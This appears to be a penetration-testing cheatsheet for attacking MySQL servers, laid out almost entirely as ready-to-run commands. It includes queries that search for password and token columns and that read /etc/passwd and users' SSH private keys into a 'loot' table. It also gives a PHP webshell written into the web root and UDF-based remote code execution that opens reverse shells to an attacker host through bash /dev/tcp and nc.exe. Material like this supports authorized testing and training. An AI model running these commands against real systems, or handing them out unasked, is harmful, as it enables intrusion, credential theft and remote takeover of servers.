Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 05. SQL / MySQL

Cheatsheet

Use this as a quick reference for MySQL enumeration, file access, and command execution.


Connect

mysql -h HOST -u USER -p
mysql -h HOST -P 3306 -u USER -p
mysql -u USER -p -S /var/run/mysqld/mysqld.sock
mysql -h HOST -u USER -p'PASSWORD' --ssl --skip-ssl-verify-server-cert

Identity And Grants

SELECT USER(), CURRENT_USER();
SHOW GRANTS FOR CURRENT_USER();
SELECT User,Host,File_priv,Super_priv FROM mysql.user WHERE File_priv='Y' OR Super_priv='Y';

Server Context

SELECT VERSION();
SHOW VARIABLES LIKE 'hostname';
SHOW VARIABLES LIKE 'version_compile_os';
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'local_infile';
SHOW VARIABLES LIKE 'plugin_dir';
SHOW PLUGINS;

Schema And Data

SHOW DATABASES;
USE DB;
SHOW TABLES;
DESCRIBE table_name;
SELECT * FROM table_name LIMIT 10;

Information schema:

SELECT table_name FROM information_schema.tables WHERE table_schema='DB';
SELECT column_name,data_type FROM information_schema.columns WHERE table_schema='DB' AND table_name='TABLE';

Credential column hunt:

SELECT table_schema, table_name, column_name
FROM information_schema.columns
WHERE column_name LIKE '%pass%'
   OR column_name LIKE '%token%'
   OR column_name LIKE '%secret%'
   OR column_name LIKE '%key%';

File Read And Write

Read:

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:/Windows/win.ini');

Write:

SELECT 'test' INTO OUTFILE '/var/lib/mysql-files/test.txt';
SELECT 'test' INTO DUMPFILE '/var/lib/mysql-files/test.bin';

Webshell:

SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

LOCAL INFILE

SHOW VARIABLES LIKE 'local_infile';
CREATE TABLE loot(line TEXT);
LOAD DATA LOCAL INFILE '/var/www/html/config.php' INTO TABLE loot;
LOAD DATA LOCAL INFILE '/home/victim/.ssh/id_rsa' INTO TABLE loot;
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE loot FIELDS TERMINATED BY '\n';

UDF RCE

Plugin directory:

SHOW VARIABLES LIKE 'plugin_dir';

Linux:

SELECT load_file('/tmp/lib_mysqludf_sys.so') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
SELECT sys_eval('id');
SELECT sys_eval('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"');

Windows:

SELECT load_file('\\\\192.168.x.x\\share\\lib_mysqludf_sys_64.dll') INTO DUMPFILE 'C:\\xampp\\mysql\\lib\\plugin\\udf.dll';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
SELECT sys_eval('whoami');
SELECT sys_eval('net use X: \\\\192.168.x.x\\kali /user:kali kali');
SELECT sys_eval('X:\\nc.exe -e cmd.exe 192.168.x.x 80');

Variant if the library exports sys_bineval:

CREATE FUNCTION sys_bineval RETURNS INT SONAME 'udf.dll';
SELECT sys_bineval('whoami');

Listener:

nc -lvnp 4444
nc -lvnp 80

Cleanup:

DROP FUNCTION IF EXISTS sys_eval;
DROP FUNCTION IF EXISTS sys_bineval;
DROP FUNCTION IF EXISTS sys_exec;

mysqlsh

sudo docker run -it --rm mysql/mysql-server mysqlsh
\connect mysqlx://USERNAME@HOST:33060
\exit